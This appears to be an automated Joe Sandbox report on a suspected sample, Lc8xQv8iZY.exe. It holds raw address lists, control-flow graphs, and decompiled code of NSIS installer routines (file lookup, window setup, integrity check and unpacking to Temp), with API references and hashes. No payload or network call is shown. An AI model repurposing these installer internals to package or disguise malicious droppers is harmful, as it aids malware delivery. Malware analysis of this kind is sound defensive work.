                                                  0x004061b7
                                                  0x004061c0
                                                  0x00406bce
                                                  0x00406bce
                                                  0x00000000
                                                  0x00406bce
                                                  0x004061c6
                                                  0x00000000
                                                  0x004061d1
                                                  0x00000000
                                                  0x00000000
                                                  0x004061da
                                                  0x004061dd
                                                  0x004061e0
                                                  0x004061e4
                                                  0x00000000
                                                  0x00000000
                                                  0x004061ea
                                                  0x004061ed
                                                  0x004061ef
                                                  0x004061f0
                                                  0x004061f3
                                                  0x004061f5
                                                  0x004061f6
                                                  0x004061f8
                                                  0x004061fb
                                                  0x00406200
                                                  0x00406205
                                                  0x0040620e
                                                  0x00406221
                                                  0x00406224
                                                  0x00406230
                                                  0x00406258
                                                  0x0040625a
                                                  0x00406268
                                                  0x00406268
                                                  0x0040626c
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0040625c
                                                  0x0040625c
                                                  0x0040625f
                                                  0x00406260
                                                  0x00406260
                                                  0x00000000
                                                  0x0040625c
                                                  0x00406236
                                                  0x0040623b
                                                  0x0040623b
                                                  0x00406244
                                                  0x0040624c
                                                  0x0040624f
                                                  0x00000000
                                                  0x00406255
                                                  0x00406255
                                                  0x00000000
                                                  0x00406255
                                                  0x00000000
                                                  0x00406272
                                                  0x00406272
                                                  0x00406276
                                                  0x00406b22
                                                  0x00000000
                                                  0x00406b22
                                                  0x0040627f
                                                  0x0040628f
                                                  0x00406292
                                                  0x00406295
                                                  0x00406295
                                                  0x00406295
                                                  0x00406298
                                                  0x0040629c
                                                  0x00000000
                                                  0x00000000
                                                  0x0040629e
                                                  0x004062a4
                                                  0x004062ce
                                                  0x004062d4
                                                  0x004062db
                                                  0x00000000
                                                  0x004062db
                                                  0x004062aa
                                                  0x004062ad
                                                  0x004062b2
                                                  0x004062b2
                                                  0x004062bd
                                                  0x004062c5
                                                  0x004062c8
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0040630d
                                                  0x00406313
                                                  0x00406316
                                                  0x00406323
                                                  0x0040632b
                                                  0x00000000
                                                  0x00000000
                                                  0x004062e2
                                                  0x004062e2
                                                  0x004062e6
                                                  0x00406b31
                                                  0x00000000
                                                  0x00406b31
                                                  0x004062f2
                                                  0x004062fd
                                                  0x004062fd
                                                  0x004062fd
                                                  0x00406300
                                                  0x00406303
                                                  0x00406306
                                                  0x0040630b
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x004065d2
                                                  0x004065d6
                                                  0x004065f4
                                                  0x004065f7
                                                  0x004065fe
                                                  0x00406601
                                                  0x00406604
                                                  0x00406607
                                                  0x0040660a
                                                  0x0040660d
                                                  0x0040660f
                                                  0x00406616
                                                  0x00406617
                                                  0x00406619
                                                  0x0040661c
                                                  0x0040661f
                                                  0x00406622
                                                  0x00406622
                                                  0x00406627
                                                  0x00000000
                                                  0x00406627
                                                  0x004065d8
                                                  0x004065db
                                                  0x004065de
                                                  0x004065e8
                                                  0x00000000
                                                  0x00000000
                                                  0x0040663c
                                                  0x00406640
                                                  0x00406663
                                                  0x00406666
                                                  0x00406669
                                                  0x00406673
                                                  0x00406642
                                                  0x00406642
                                                  0x00406645
                                                  0x00406648
                                                  0x0040664b
                                                  0x00406658
                                                  0x0040665b
                                                  0x0040665b
                                                  0x00000000
                                                  0x00000000
                                                  0x0040667f
                                                  0x00406683
                                                  0x00000000
                                                  0x00000000
                                                  0x00406689
                                                  0x0040668d
                                                  0x00000000
                                                  0x00000000
                                                  0x00406693
                                                  0x00406695
                                                  0x00406699
                                                  0x00406699
                                                  0x0040669c
                                                  0x004066a0
                                                  0x00000000
                                                  0x00000000
                                                  0x004066f0
                                                  0x004066f4
                                                  0x004066fb
                                                  0x004066fe
                                                  0x00406701
                                                  0x0040670b
                                                  0x00000000
                                                  0x0040670b
                                                  0x004066f6
                                                  0x00000000
                                                  0x00000000
                                                  0x00406717
                                                  0x0040671b
                                                  0x00406722
                                                  0x00406725
                                                  0x00406728
                                                  0x0040671d
                                                  0x0040671d
                                                  0x0040671d
                                                  0x0040672b
                                                  0x0040672e
                                                  0x00406731
                                                  0x00406731
                                                  0x00406734
                                                  0x00406737
                                                  0x0040673a
                                                  0x0040673a
                                                  0x0040673d
                                                  0x00406744
                                                  0x00406749
                                                  0x00000000
                                                  0x00000000
                                                  0x004067d7
                                                  0x004067d7
                                                  0x004067db
                                                  0x00406b79
                                                  0x00000000
                                                  0x00406b79
                                                  0x004067e1
                                                  0x004067e4
                                                  0x004067e7
                                                  0x004067eb
                                                  0x004067ee
                                                  0x004067f4
                                                  0x004067f6
                                                  0x004067f6
                                                  0x004067f6
                                                  0x004067f9
                                                  0x004067fc
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0040685a
                                                  0x0040685a
                                                  0x0040685e
                                                  0x00406b85
                                                  0x00000000
                                                  0x00406b85
                                                  0x00406864
                                                  0x00406867
                                                  0x0040686a
                                                  0x0040686e
                                                  0x00406871
                                                  0x00406877
                                                  0x00406879
                                                  0x00406879
                                                  0x00406879
                                                  0x0040687c
                                                  0x00000000
                                                  0x00000000
                                                  0x0040662a
                                                  0x0040662a
                                                  0x0040662d
                                                  0x00000000
                                                  0x00000000
                                                  0x00406969
                                                  0x0040696d
                                                  0x0040698f
                                                  0x00406992
                                                  0x0040699c
                                                  0x00000000
                                                  0x0040699c
                                                  0x0040696f
                                                  0x00406972
                                                  0x00406976
                                                  0x00406979
                                                  0x00406979
                                                  0x0040697c
                                                  0x00000000
                                                  0x00000000
                                                  0x00406a26
                                                  0x00406a2a
                                                  0x00406a48
                                                  0x00406a48
                                                  0x00406a48
                                                  0x00406a4f
                                                  0x00406a56
                                                  0x00406a5d
                                                  0x00406a5d
                                                  0x00000000
                                                  0x00406a5d
                                                  0x00406a2c
                                                  0x00406a2f
                                                  0x00406a32
                                                  0x00406a35
                                                  0x00406a3c
                                                  0x00406980
                                                  0x00406980
                                                  0x00406983
                                                  0x00000000
                                                  0x00000000
                                                  0x00406b17
                                                  0x00406b1a
                                                  0x00000000
                                                  0x00000000
                                                  0x00406751
                                                  0x00406753
                                                  0x0040675a
                                                  0x0040675b
                                                  0x0040675d
                                                  0x00406760
                                                  0x00000000
                                                  0x00000000
                                                  0x00406768
                                                  0x0040676b
                                                  0x0040676e
                                                  0x00406770
                                                  0x00406772
                                                  0x00406772
                                                  0x00406773
                                                  0x00406776
                                                  0x0040677d
                                                  0x00406780
                                                  0x0040678e
                                                  0x00000000
                                                  0x00000000
                                                  0x00406a64
                                                  0x00406a64
                                                  0x00406a67
                                                  0x00406a6e
                                                  0x00000000
                                                  0x00000000
                                                  0x00406a73
                                                  0x00406a73
                                                  0x00406a77
                                                  0x00406baf
                                                  0x00000000
                                                  0x00406baf
                                                  0x00406a7d
                                                  0x00406a80
                                                  0x00406a83
                                                  0x00406a87
                                                  0x00406a8a
                                                  0x00406a90

                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.311843412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.311830550.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311864314.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311880086.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311893353.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311939843.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311957547.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311975233.000000000042D000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Lc8xQv8iZY.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9df4b00e3dfa736f107e28386e2211fee1d6be591f2ba6f0ce01288237ab4b61
                                                  • Instruction ID: bdeebfab4b2853dd6ba105009d9d55a4887b03880c8adf7539db3398297304ab
                                                  • Opcode Fuzzy Hash: 9df4b00e3dfa736f107e28386e2211fee1d6be591f2ba6f0ce01288237ab4b61
                                                  • Instruction Fuzzy Hash: 61F16871D00229CBCF28CFA8C8946ADBBB1FF45305F25816ED856BB281D7785A96CF44
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 627 405ff6-40600a FindFirstFileA 628 406017 627->628 629 40600c-406015 FindClose 627->629 630 406019-40601a 628->630 629->630
                                                  C-Code - Quality: 100%
                                                  			E00405FF6(CHAR* _a4) {
                                                  				void* _t2;
                                                  
                                                  				_t2 = FindFirstFileA(_a4, 0x4225d0); // executed
                                                  				if(_t2 == 0xffffffff) {
                                                  					return 0;
                                                  				}
                                                  				FindClose(_t2);
                                                  				return 0x4225d0;
                                                  			}





                                                  APIs
                                                  • FindFirstFileA.KERNELBASE(?,004225D0,C:\,00405912,C:\,C:\,00000000,C:\,C:\,?,?,7476F560,00405634,?,C:\Users\user\AppData\Local\Temp\,7476F560), ref: 00406001
                                                  • FindClose.KERNEL32(00000000), ref: 0040600D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.311843412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.311830550.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311864314.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311880086.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311893353.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311939843.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311957547.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311975233.000000000042D000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Lc8xQv8iZY.jbxd
                                                  Similarity
                                                  • API ID: Find$CloseFileFirst
                                                  • String ID: C:\
                                                  • API String ID: 2295610775-3404278061
                                                  • Opcode ID: af11e85da2dc783dbe13656bd5508f9fb20cf1c530974d89e4c44af9708dc560
                                                  • Instruction ID: bebaf1ec17e03c7be3b4f7568d9df3fae16269376aceebcceaf96dbad000be3e
                                                  • Opcode Fuzzy Hash: af11e85da2dc783dbe13656bd5508f9fb20cf1c530974d89e4c44af9708dc560
                                                  • Instruction Fuzzy Hash: 20D012719480206BC3105B387D0C85B7A589F89330711CA33F566FA2E0D7749CB2AAED
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 134 40374e-403766 call 406087 137 403768-403778 call 405c59 134->137 138 40377a-4037a1 call 405be2 134->138 147 4037c4-4037ed call 403a17 call 4058cf 137->147 143 4037a3-4037b4 call 405be2 138->143 144 4037b9-4037bf lstrcatA 138->144 143->144 144->147 152 4037f3-4037f8 147->152 153 403874-40387c call 4058cf 147->153 152->153 154 4037fa-40381e call 405be2 152->154 159 40388a-4038af LoadImageA 153->159 160 40387e-403885 call 405d1d 153->160 154->153 161 403820-403822 154->161 163 4038b5-4038eb RegisterClassA 159->163 164 40393e-403946 call 40140b 159->164 160->159 165 403833-40383f lstrlenA 161->165 166 403824-403831 call 405819 161->166 167 4038f1-403939 SystemParametersInfoA CreateWindowExA 163->167 168 403a0d 163->168 177 403950-40395b call 403a17 164->177 178 403948-40394b 164->178 172 403841-40384f lstrcmpiA 165->172 173 403867-40386f call 4057ee call 405cfb 165->173 166->165 167->164 171 403a0f-403a16 168->171 172->173 176 403851-40385b GetFileAttributesA 172->176 173->153 180 403861-403862 call 405835 176->180 181 40385d-40385f 176->181 187 403961-40397b ShowWindow call 40601d 177->187 188 4039e4-4039ec call 4050b9 177->188 178->171 180->173 181->173 181->180 193 403987-403999 GetClassInfoA 187->193 194 40397d-403982 call 40601d 187->194 195 403a06-403a08 call 40140b 188->195 196 4039ee-4039f4 188->196 200 4039b1-4039e2 DialogBoxParamA call 40140b call 40369e 193->200 201 40399b-4039ab GetClassInfoA RegisterClassA 193->201 194->193 195->168 196->178 197 4039fa-403a01 call 40140b 196->197 197->178 200->171 201->200
                                                  C-Code - Quality: 96%
                                                  			E0040374E(void* __eflags) {
                                                  				intOrPtr _v4;
                                                  				intOrPtr _v8;
                                                  				int _v12;
                                                  				int _v16;
                                                  				char _v20;
                                                  				void* __ebx;
                                                  				void* __edi;
                                                  				void* __esi;
                                                  				intOrPtr* _t20;
                                                  				void* _t28;
                                                  				void* _t30;
                                                  				int _t31;
                                                  				void* _t34;
                                                  				int _t37;
                                                  				int _t38;
                                                  				int _t42;
                                                  				char _t62;
                                                  				CHAR* _t64;
                                                  				signed char _t68;
                                                  				CHAR* _t79;
                                                  				intOrPtr _t81;
                                                  				CHAR* _t85;
                                                  
                                                  				_t81 =  *0x423f90;
                                                  				_t20 = E00406087(3);
                                                  				_t88 = _t20;
                                                  				if(_t20 == 0) {
                                                  					_t79 = 0x420580;
                                                  					"1033" = 0x7830;
                                                  					E00405BE2(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x420580, 0);
                                                  					__eflags =  *0x420580;
                                                  					if(__eflags == 0) {
                                                  						E00405BE2(0x80000003, ".DEFAULT\\Control Panel\\International",  &M004072F6, 0x420580, 0);
                                                  					}
                                                  					lstrcatA("1033", _t79);
                                                  				} else {
                                                  					E00405C59("1033",  *_t20() & 0x0000ffff);
                                                  				}
                                                  				E00403A17(_t76, _t88);
                                                  				_t84 = "C:\\Users\\jones\\AppData\\Local\\Temp";
                                                  				 *0x424000 =  *0x423f98 & 0x00000020;
                                                  				 *0x42401c = 0x10000;
                                                  				if(E004058CF(_t88, "C:\\Users\\jones\\AppData\\Local\\Temp") != 0) {
                                                  					L16:
                                                  					if(E004058CF(_t96, _t84) == 0) {
                                                  						E00405D1D(0, _t79, _t81, _t84,  *((intOrPtr*)(_t81 + 0x118)));
                                                  					}
                                                  					_t28 = LoadImageA( *0x423f80, 0x67, 1, 0, 0, 0x8040); // executed
                                                  					 *0x423768 = _t28;
                                                  					if( *((intOrPtr*)(_t81 + 0x50)) == 0xffffffff) {
                                                  						L21:
                                                  						if(E0040140B(0) == 0) {
                                                  							_t30 = E00403A17(_t76, __eflags);
                                                  							__eflags =  *0x424020;
                                                  							if( *0x424020 != 0) {
                                                  								_t31 = E004050B9(_t30, 0);
                                                  								__eflags = _t31;
                                                  								if(_t31 == 0) {
                                                  									E0040140B(1);
                                                  									goto L33;
                                                  								}
                                                  								__eflags =  *0x42374c;
                                                  								if( *0x42374c == 0) {
                                                  									E0040140B(2);
                                                  								}
                                                  								goto L22;
                                                  							}
                                                  							ShowWindow( *0x420558, 5);
                                                  							_t37 = E0040601D("RichEd20");
                                                  							__eflags = _t37;
                                                  							if(_t37 == 0) {
                                                  								E0040601D("RichEd32");
                                                  							}
                                                  							_t85 = "RichEdit20A";
                                                  							_t38 = GetClassInfoA(0, _t85, 0x423720);
                                                  							__eflags = _t38;
                                                  							if(_t38 == 0) {
                                                  								GetClassInfoA(0, "RichEdit", 0x423720);
                                                  								 *0x423744 = _t85;
                                                  								RegisterClassA(0x423720);
                                                  							}
                                                  							_t42 = DialogBoxParamA( *0x423f80,  *0x423760 + 0x00000069 & 0x0000ffff, 0, E00403AE4, 0);
                                                  							E0040369E(E0040140B(5), 1);
                                                  							return _t42;
                                                  						}
                                                  						L22:
                                                  						_t34 = 2;
                                                  						return _t34;
                                                  					} else {
                                                  						_t76 =  *0x423f80;
                                                  						 *0x423734 = _t28;
                                                  						_v20 = 0x624e5f;
                                                  						 *0x423724 = E00401000;
                                                  						 *0x423730 =  *0x423f80;
                                                  						 *0x423744 =  &_v20;
                                                  						if(RegisterClassA(0x423720) == 0) {
                                                  							L33:
                                                  							__eflags = 0;
                                                  							return 0;
                                                  						}
                                                  						_t12 =  &_v16; // 0x624e5f
                                                  						SystemParametersInfoA(0x30, 0, _t12, 0);
                                                  						 *0x420558 = CreateWindowExA(0x80,  &_v20, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x423f80, 0);
                                                  						goto L21;
                                                  					}
                                                  				} else {
                                                  					_t76 =  *(_t81 + 0x48);
                                                  					if(_t76 == 0) {
                                                  						goto L16;
                                                  					}
                                                  					_t79 = 0x422f20;
                                                  					E00405BE2( *((intOrPtr*)(_t81 + 0x44)), _t76,  *((intOrPtr*)(_t81 + 0x4c)) +  *0x423fb8, 0x422f20, 0);
                                                  					_t62 =  *0x422f20; // 0x22
                                                  					if(_t62 == 0) {
                                                  						goto L16;
                                                  					}
                                                  					if(_t62 == 0x22) {
                                                  						_t79 = 0x422f21;
                                                  						 *((char*)(E00405819(0x422f21, 0x22))) = 0;
                                                  					}
                                                  					_t64 = lstrlenA(_t79) + _t79 - 4;
                                                  					if(_t64 <= _t79 || lstrcmpiA(_t64, ?str?) != 0) {
                                                  						L15:
                                                  						E00405CFB(_t84, E004057EE(_t79));
                                                  						goto L16;
                                                  					} else {
                                                  						_t68 = GetFileAttributesA(_t79);
                                                  						if(_t68 == 0xffffffff) {
                                                  							L14:
                                                  							E00405835(_t79);
                                                  							goto L15;
                                                  						}
                                                  						_t96 = _t68 & 0x00000010;
                                                  						if((_t68 & 0x00000010) != 0) {
                                                  							goto L15;
                                                  						}
                                                  						goto L14;
                                                  					}
                                                  				}
                                                  			}

























                                                  APIs
                                                    • Part of subcall function 00406087: GetModuleHandleA.KERNEL32(?,?,00000000,004032BB,0000000D,SETUPAPI,USERENV,UXTHEME), ref: 00406099
                                                    • Part of subcall function 00406087: GetProcAddress.KERNEL32(00000000,?), ref: 004060B4
                                                  • lstrcatA.KERNEL32(1033,00420580,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420580,00000000,00000003,C:\Users\user\AppData\Local\Temp\,00000000,"C:\Users\user\Desktop\Lc8xQv8iZY.exe",00000000), ref: 004037BF
                                                  • lstrlenA.KERNEL32(00422F20,?,?,?,00422F20,00000000,C:\Users\user\AppData\Local\Temp,1033,00420580,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420580,00000000,00000003,C:\Users\user\AppData\Local\Temp\), ref: 00403834
                                                  • lstrcmpiA.KERNEL32(?,.exe,00422F20,?,?,?,00422F20,00000000,C:\Users\user\AppData\Local\Temp,1033,00420580,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420580,00000000), ref: 00403847
                                                  • GetFileAttributesA.KERNEL32(00422F20), ref: 00403852
                                                  • LoadImageA.USER32 ref: 0040389B
                                                    • Part of subcall function 00405C59: wsprintfA.USER32 ref: 00405C66
                                                  • RegisterClassA.USER32 ref: 004038E2
                                                  • SystemParametersInfoA.USER32(00000030,00000000,_Nb,00000000), ref: 004038FA
                                                  • CreateWindowExA.USER32 ref: 00403933
                                                  • ShowWindow.USER32(00000005,00000000), ref: 00403969
                                                  • GetClassInfoA.USER32 ref: 00403995
                                                  • GetClassInfoA.USER32 ref: 004039A2
                                                  • RegisterClassA.USER32 ref: 004039AB
                                                  • DialogBoxParamA.USER32 ref: 004039CA
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.311843412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.311830550.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311864314.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311880086.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311893353.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311939843.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311957547.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311975233.000000000042D000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Lc8xQv8iZY.jbxd
                                                  Similarity
                                                  • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                  • String ID: /B$ 7B$!/B$"C:\Users\user\Desktop\Lc8xQv8iZY.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                  • API String ID: 1975747703-2594716311
                                                  • Opcode ID: 63b9a726db211dfa8162015ea6a93c81adf93a5d18f7de7b76b8cf033c026b55
                                                  • Instruction ID: 6194fd7cfee4ca64757fce53943c04d911d469c5366995da23240c14efb645f2
                                                  • Opcode Fuzzy Hash: 63b9a726db211dfa8162015ea6a93c81adf93a5d18f7de7b76b8cf033c026b55
                                                  • Instruction Fuzzy Hash: 6161B6B17442407ED620BF65AD45F2B3ABCEB8474AF40453FF941B22E1D67CA9418A2D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 208 402c88-402cd6 GetTickCount GetModuleFileNameA call 4059d2 211 402ce2-402d10 call 405cfb call 405835 call 405cfb GetFileSize 208->211 212 402cd8-402cdd 208->212 220 402e00-402e0e call 402be9 211->220 221 402d16-402d2d 211->221 213 402f27-402f2b 212->213 228 402e14-402e17 220->228 229 402edf-402ee4 220->229 223 402d31-402d37 call 4031d5 221->223 224 402d2f 221->224 227 402d3c-402d3e 223->227 224->223 230 402d44-402d4a 227->230 231 402e9b-402ea3 call 402be9 227->231 232 402e43-402e8f GlobalAlloc call 406164 call 405a01 CreateFileA 228->232 233 402e19-402e31 call 403207 call 4031d5 228->233 229->213 234 402dca-402dce 230->234 235 402d4c-402d64 call 405993 230->235 231->229 259 402e91-402e96 232->259 260 402ea5-402ed5 call 403207 call 402f2e 232->260 233->229 256 402e37-402e3d 233->256 243 402dd0-402dd6 call 402be9 234->243 244 402dd7-402ddd 234->244 235->244 253 402d66-402d6d 235->253 243->244 246 402df0-402dfa 244->246 247 402ddf-402ded call 4060f6 244->247 246->220 246->221 247->246 253->244 258 402d6f-402d76 253->258 256->229 256->232 258->244 261 402d78-402d7f 258->261 259->213 268 402eda-402edd 260->268 261->244 263 402d81-402d88 261->263 263->244 265 402d8a-402daa 263->265 265->229 267 402db0-402db4 265->267 269 402db6-402dba 267->269 270 402dbc-402dc4 267->270 268->229 271 402ee6-402ef7 268->271 269->220 269->270 270->244 274 402dc6-402dc8 270->274 272 402ef9 271->272 273 402eff-402f04 271->273 272->273 275 402f05-402f0b 273->275 274->244 275->275 276 402f0d-402f25 call 405993 275->276 276->213
                                                  C-Code - Quality: 96%
                                                  			E00402C88(void* __eflags, signed int _a4) {
                                                  				long _v8;
                                                  				long _v12;
                                                  				intOrPtr _v16;
                                                  				long _v20;
                                                  				intOrPtr _v24;
                                                  				intOrPtr _v28;
                                                  				intOrPtr _v32;
                                                  				intOrPtr _v36;
                                                  				signed int _v40;
                                                  				char _v300;
                                                  				long _t54;
                                                  				void* _t57;
                                                  				void* _t62;
                                                  				intOrPtr _t65;
                                                  				void* _t68;
                                                  				intOrPtr* _t70;
                                                  				intOrPtr _t71;
                                                  				long _t82;
                                                  				void* _t83;
                                                  				signed int _t89;
                                                  				intOrPtr _t92;
                                                  				void* _t101;
                                                  				signed int _t103;
                                                  				void* _t105;
                                                  				long _t106;
                                                  				long _t109;
                                                  				void* _t110;
                                                  
                                                  				_v8 = 0;
                                                  				_v12 = 0;
                                                  				 *0x423f8c = GetTickCount() + 0x3e8;
                                                  				GetModuleFileNameA(0, "C:\\Users\\jones\\Desktop\\Lc8xQv8iZY.exe", 0x400);
                                                  				_t105 = E004059D2("C:\\Users\\jones\\Desktop\\Lc8xQv8iZY.exe", 0x80000000, 3);
                                                  				 *0x409014 = _t105;
                                                  				if(_t105 == 0xffffffff) {
                                                  					return "Error launching installer";
                                                  				}
                                                  				E00405CFB("C:\\Users\\jones\\Desktop", "C:\\Users\\jones\\Desktop\\Lc8xQv8iZY.exe");
                                                  				E00405CFB(0x42c000, E00405835("C:\\Users\\jones\\Desktop"));
                                                  				_t54 = GetFileSize(_t105, 0);
                                                  				 *0x41f130 = _t54;
                                                  				_t109 = _t54;
                                                  				if(_t54 <= 0) {
                                                  					L22:
                                                  					E00402BE9(1);
                                                  					if( *0x423f94 == 0) {
                                                  						goto L30;
                                                  					}
                                                  					if(_v12 == 0) {
                                                  						L26:
                                                  						_t57 = GlobalAlloc(0x40, _v20); // executed
                                                  						_t110 = _t57;
                                                  						E00406164(0x40b098);
                                                  						E00405A01( &_v300, "C:\\Users\\jones\\AppData\\Local\\Temp\\"); // executed
                                                  						_t62 = CreateFileA( &_v300, 0xc0000000, 0, 0, 2, 0x4000100, 0); // executed
                                                  						 *0x409018 = _t62;
                                                  						if(_t62 != 0xffffffff) {
                                                  							_t65 = E00403207( *0x423f94 + 0x1c);
                                                  							 *0x41f134 = _t65;
                                                  							 *0x417128 = _t65 - ( !_v40 & 0x00000004) + _v16 - 0x1c; // executed
                                                  							_t68 = E00402F2E(_v16, 0xffffffff, 0, _t110, _v20); // executed
                                                  							if(_t68 == _v20) {
                                                  								 *0x423f90 = _t110;
                                                  								 *0x423f98 =  *_t110;
                                                  								if((_v40 & 0x00000001) != 0) {
                                                  									 *0x423f9c =  *0x423f9c + 1;
                                                  								}
                                                  								_t45 = _t110 + 0x44; // 0x44
                                                  								_t70 = _t45;
                                                  								_t101 = 8;
                                                  								do {
                                                  									_t70 = _t70 - 8;
                                                  									 *_t70 =  *_t70 + _t110;
                                                  									_t101 = _t101 - 1;
                                                  								} while (_t101 != 0);
                                                  								_t71 =  *0x417124; // 0x505a9
                                                  								 *((intOrPtr*)(_t110 + 0x3c)) = _t71;
                                                  								E00405993(0x423fa0, _t110 + 4, 0x40);
                                                  								return 0;
                                                  							}
                                                  							goto L30;
                                                  						}
                                                  						return "Error writing temporary file. Make sure your temp folder is valid.";
                                                  					}
                                                  					E00403207( *0x417120);
                                                  					if(E004031D5( &_a4, 4) == 0 || _v8 != _a4) {
                                                  						goto L30;
                                                  					} else {
                                                  						goto L26;
                                                  					}
                                                  				} else {
                                                  					do {
                                                  						_t106 = _t109;
                                                  						asm("sbb eax, eax");
                                                  						_t82 = ( ~( *0x423f94) & 0x00007e00) + 0x200;
                                                  						if(_t109 >= _t82) {
                                                  							_t106 = _t82;
                                                  						}
                                                  						_t83 = E004031D5(0x417130, _t106); // executed
                                                  						if(_t83 == 0) {
                                                  							E00402BE9(1);
                                                  							L30:
                                                  							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
                                                  						}
                                                  						if( *0x423f94 != 0) {
                                                  							if((_a4 & 0x00000002) == 0) {
                                                  								E00402BE9(0);
                                                  							}
                                                  							goto L19;
                                                  						}
                                                  						E00405993( &_v40, 0x417130, 0x1c);
                                                  						_t89 = _v40;
                                                  						if((_t89 & 0xfffffff0) == 0 && _v36 == 0xdeadbeef && _v24 == 0x74736e49 && _v28 == 0x74666f73 && _v32 == 0x6c6c754e) {
                                                  							_a4 = _a4 | _t89;
                                                  							_t103 =  *0x417120; // 0x199ed
                                                  							 *0x424020 =  *0x424020 | _a4 & 0x00000002;
                                                  							_t92 = _v16;
                                                  							 *0x423f94 = _t103;
                                                  							if(_t92 > _t109) {
                                                  								goto L30;
                                                  							}
                                                  							if((_a4 & 0x00000008) != 0 || (_a4 & 0x00000004) == 0) {
                                                  								_v12 = _v12 + 1;
                                                  								_t109 = _t92 - 4;
                                                  								if(_t106 > _t109) {
                                                  									_t106 = _t109;
                                                  								}
                                                  								goto L19;
                                                  							} else {
                                                  								goto L22;
                                                  							}
                                                  						}
                                                  						L19:
                                                  						if(_t109 <  *0x41f130) {
                                                  							_v8 = E004060F6(_v8, 0x417130, _t106);
                                                  						}
                                                  						 *0x417120 =  *0x417120 + _t106;
                                                  						_t109 = _t109 - _t106;
                                                  					} while (_t109 > 0);
                                                  					goto L22;
                                                  				}
                                                  			}































                                                  APIs
                                                  • GetTickCount.KERNEL32 ref: 00402C9C
                                                  • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\Lc8xQv8iZY.exe,00000400), ref: 00402CB8
                                                    • Part of subcall function 004059D2: GetFileAttributesA.KERNELBASE(00000003,00402CCB,C:\Users\user\Desktop\Lc8xQv8iZY.exe,80000000,00000003), ref: 004059D6
                                                    • Part of subcall function 004059D2: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004059F8
